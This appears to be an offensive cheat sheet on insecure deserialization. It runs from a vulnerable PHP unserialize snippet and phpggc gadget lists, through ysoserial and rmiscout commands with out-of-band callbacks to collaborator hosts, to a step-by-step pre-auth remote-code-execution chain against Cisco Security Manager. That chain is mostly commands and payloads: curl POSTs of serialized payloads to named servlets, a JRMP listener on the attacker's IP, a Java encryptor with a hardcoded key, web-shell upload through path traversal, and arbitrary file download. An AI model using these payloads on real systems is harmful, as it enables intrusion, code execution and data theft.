(De)Serialization
Vulnerable block of code:
<?php$data = unserialize($_GET['data']);print $data['message'];
$ ./phpggc -lGadget Chains-------------NAME VERSION TYPE VECTOR ICodeIgniter4/RCE1 4.0.0-beta.1 <= 4.0.0-rc.4 RCE (Function call) __destructCodeIgniter4/RCE2 4.0.0-rc.4 <= 4.0.4+ RCE (Function call) __destructDoctrine/FW1 ? File write __toString *Drupal7/FD1 7.0 < ? File delete __destruct *Drupal7/RCE1 7.0.8 < ? RCE (Function call) __destruct *Guzzle/FW1 6.0.0 <= 6.3.3+ File write __destructGuzzle/INFO1 6.0.0 <= 6.3.2 phpinfo() __destruct *Guzzle/RCE1 6.0.0 <= 6.3.2 RCE (Function call) __destruct *Horde/RCE1 <= 5.2.22 RCE (PHP code) __destruct *Laminas/FD1 <= 2.11.2 File delete __destructLaravel/RCE1 5.4.27 RCE (Function call) __destructLaravel/RCE2 5.5.39 RCE (Function call) __destructLaravel/RCE3 5.5.39 RCE (Function call) __destruct *Laravel/RCE4 5.5.39 RCE (Function call) __destructLaravel/RCE5 5.8.30 RCE (PHP code) __destruct *Laravel/RCE6 5.5.* RCE (PHP code) __destruct *Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct *Magento/FW1 ? <= 1.9.4.0 File write __destruct *Magento/SQLI1 ? <= 1.9.4.0 SQL injection __destructMonolog/RCE1 1.18 <= 2.1.1+ RCE (Function call) __destructMonolog/RCE2 1.5 <= 2.1.1+ RCE (Function call) __destructMonolog/RCE3 1.1.0 <= 1.10.0 RCE (Function call) __destructMonolog/RCE4 ? <= 2.4.4+ RCE (Command) __destruct *Phalcon/RCE1 <= 1.2.2 RCE __wakeup *PHPCSFixer/FD1 <= 2.17.3 File delete __destructPHPCSFixer/FD2 <= 2.17.3 File delete __destructPHPExcel/FD1 1.8.2+ File delete __destructPHPExcel/FD2 <= 1.8.1 File delete __destructPHPExcel/FD3 1.8.2+ File delete __destructPHPExcel/FD4 <= 1.8.1 File delete __destructPydio/Guzzle/RCE1 < 8.2.2 RCE (Function call) __toStringSlim/RCE1 3.8.1 RCE (Function call) __toStringSmarty/FD1 ? File delete __destructSmarty/SSRF1 ? SSRF __destruct *SwiftMailer/FD1 -5.4.12+, -6.2.1+ File delete __destructSwiftMailer/FW1 5.1.0 <= 5.4.8 File write __toStringSwiftMailer/FW2 6.0.0 <= 6.0.1 File write __toStringSwiftMailer/FW3 5.0.1 File write __toStringSwiftMailer/FW4 4.0.0 <= ? File write __destructSymfony/FW1 2.5.2 File write DebugImport *Symfony/FW2 3.4 File write __destructSymfony/RCE1 3.3 RCE (Command) __destruct *Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct *Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct *Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct *Symfony/RCE5 5.2.* RCE (Function call) __destructTCPDF/FD1 <= 6.3.5 File delete __destruct *ThinkPHP/RCE1 5.1.x-5.2.x RCE (Function call) __destruct *WordPress/Dompdf/RCE1 0.8.5+ & WP < 5.5.2 RCE (Function call) __destruct *WordPress/Dompdf/RCE2 0.7.0 <= 0.8.4 & WP < 5.5.2 RCE (Function call) __destruct *WordPress/Guzzle/RCE1 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __toString *WordPress/Guzzle/RCE2 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __destruct *WordPress/P/EmailSubscribers/RCE1 4.0 <= 4.4.7+ & WP < 5.5.2 RCE (Function call) __destruct *WordPress/P/EverestForms/RCE1 1.0 <= 1.6.7+ & WP < 5.5.2 RCE (Function call) __destruct *WordPress/P/WooCommerce/RCE1 3.4.0 <= 4.1.0+ & WP < 5.5.2 RCE (Function call) __destruct *WordPress/P/WooCommerce/RCE2 <= 3.4.0 & WP < 5.5.2 RCE (Function call) __destruct *WordPress/P/YetAnotherStarsRating/RCE1 ? <= 1.8.6 & WP < 5.5.2 RCE (Function call) __destruct *WordPress/PHPExcel/RCE1 1.8.2+ & WP < 5.5.2 RCE (Function call) __toString *WordPress/PHPExcel/RCE2 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __toString *WordPress/PHPExcel/RCE3 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct *WordPress/PHPExcel/RCE4 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct *WordPress/PHPExcel/RCE5 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct *WordPress/PHPExcel/RCE6 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct *Yii/RCE1 1.1.20 RCE (Function call) __wakeup *Yii2/RCE1 <2.0.38 RCE (Function call) __destruct *Yii2/RCE2 <2.0.38 RCE (PHP code) __destruct *ZendFramework/FD1 ? <= 1.12.20 File delete __destructZendFramework/RCE1 ? <= 1.12.20 RCE (PHP code) __destruct *ZendFramework/RCE2 1.11.12 <= 1.12.20 RCE (Function call) __toString *ZendFramework/RCE3 2.0.1 <= ? RCE (Function call) __destructZendFramework/RCE4 ? <= 1.12.20 RCE (PHP code) __destruct *
nmap --script rmi*
{"__type":"a"}{"__type1":"a"}{"__type":"System.Xml.XmlDocument, System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", "InnerXml":"<!DOCTYPE stuff SYSTEM 'http://gqaxjsf76ajzgrxlvj9chh21ksqje8.burpcollaborator.net'><stuff>here</stuff>"}
https://github.com/frohoff/ysoserial$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat...0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........0000570: 0078 7071 007e 003a .xpq.~.:$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin$ nc 10.10.10.10 1099 < groovypayload.bin$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
https://github.com/BishopFox/rmiscout./rmiscout.sh wordlist -i lists/prototypes.txt localhost 11099java -jar rmiscout.jar wordlist -hexamples:# Perform wordlist-attack against remote RMI service using wordlist of function prototypes./rmiscout.sh wordlist -i lists/prototypes.txt <host> <port># Bruteforce using method wordlist and other options./rmiscout.sh bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port># Swap object-derived types with the specified ysoserial payload and payload parameter./rmiscout.sh exploit -s 'void vulnSignature(java.lang.String a, int b)' -p ysoserial.payloads.URLDNS -c "http://examplesubdomain.burpcollaborator.net" -n registryName <host> <port># Use GadgetProbe and a known signature to bruteforce classes on the remote classpath./rmiscout.sh probe -s 'void vulnSignature(java.lang.String a, int b)' -i ../GadgetProbe/wordlists/maven_popular.list -d "examplesubdomain.burpcollaborator.net" -n registryName <host> <port>java -jar rmiscout-1.03-SNAPSHOT-all.jar wordlist -i lists/prototypes.txt 10.27.4.12 9050 --activation-serverjava -jar rmiscout-1.03-SNAPSHOT-all.jar bruteforce -i lists/methods.txt -r void,String -p String,Object -l 1,2 10.27.4.12 9050 --activation-serverjava -jar rmiscout-1.03-SNAPSHOT-all.jar exploit -s 'String echoString(String x)' -p ysoserial.payloads.Groovy1 -c "nslookup aiwjstf21seieezd11yr6ymgl7rzfo.burpcollaborator.net" -n RMIInterface 10.27.4.12 9050 --activation-serverjava -jar rmiscout-1.03-SNAPSHOT-all.jar probe -s 'String echo(java.lang.Object qwewqe)' -i maven_popular.list -d "nslookup aiwjstf21seieezd11yr6ymgl7rzfo.burpcollaborator.net" -n RMIInterface 10.27.4.12 9050maven_popular.list:https://raw.githubusercontent.com/BishopFox/GadgetProbe/master/wordlists/maven_popular.list
Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.
Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.
Requirement: Download commons-beanutils-1.6.1.jar from central maven repository.
java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils
curl -k --request POST --data-binary "@payload_CommonsBeanutils" https://[TARGET_HOST]/CSCOnm/servlet/SecretService.jsp
Compile JaasEncryptor.java and replace the b64Payload content:
import java.security.InvalidKeyException;import java.util.Base64;import com.cisco.nm.cmf.security.jaas.BlobCrypt;public class JaasEncryptor {public static void main(String args[]) {String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";byte[] payload = Base64.getDecoder().decode(b64Payload);byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};byte[] enc = BlobCrypt.encryptArray(payload, key);System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));byte[] dec = BlobCrypt.decryptArray(enc, key);}}
Prepare JRMP Listener:
java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 443
java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:443' | base64 -w0
Compile encrypted payload:
javac -cp [YOUR_PATH]]/server_jars_classes/jars.jar:./ JaasEncryptor2.java; java -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor
Send payload to Servlet with parameters cmd=data + new line + data=[ENCRYPTED_PAYLOAD].
Prepare JRMP Listener:
java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"
java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:1337' > payload_JRMP1_2
Send request:
curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet
Prepare JRMP listener:
java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"
java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_3
Send request:
curl -k --request POST --data-binary "@payload_JRMP1_3" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet
java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils1_2
curl -i -s -k -X $'POST' -H $'Content-Type: application/octet-stream' -H $'CTM-URN: com-cisco-nm-vms-ipintel-IpIntelligenceApi' -H $'CTM-VERSION: 1.5' -H $'CTM-PRODUCT-ID: /C:/Program Files (x86)/CSCOpx/MDC/tomcat/vms/athena/WEB-INF/lib/' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'User-Agent: Java/1.8.0_222' -H $'Host: [TARGET_IP]' -H $'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' -H $'Connection: keep-alive' --data-binary "@payload_CommonsBeanutils1_2" $'https://[TARGET_IP]/athena/CTMServlet'
GET /athena/xdmProxy/xdmConfig[RELATIVE_PATH_TO_FILE]
GET /athena/xdmProxy/xdmResources[RELATIVE_PATH_TO_FILE]?dmTargetType=TARGET.IDS&dmOsVersion=7.&command=editConfigDelta
Write a web shell e.g.
POST /cwhp/XmpFileUploadServlet?maxFileSize=100
Normal multi-part e.g. writing web shell in filename with ../../MDC/tomcat/webapps/cwhp/testme.jsp.
GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=[RELATIVE_PATH_TO_DIRECTORY]&readmeText=1
This will respond with a ZIP file containing all files from the directory.
GET /cwhp/SampleFileDownloadServlet?downloadZipFileName=pwned&downloadFiles=README&downloadLocation=[RELATIVE_PATH_TO_DIRECTORY]
This will respond with a ZIP file containing all files from the directory.
GET /athena/itf/resultsFrame.jsp?filename=[RELATIVE_PATH_TO_FILE]
See also https://de.tenable.com/security/research/tra-2017-23
java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"
java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2
curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet
Reference: https://gist.github.com/Frycos/8bf5c125d720b3504b4f28a1126e509e
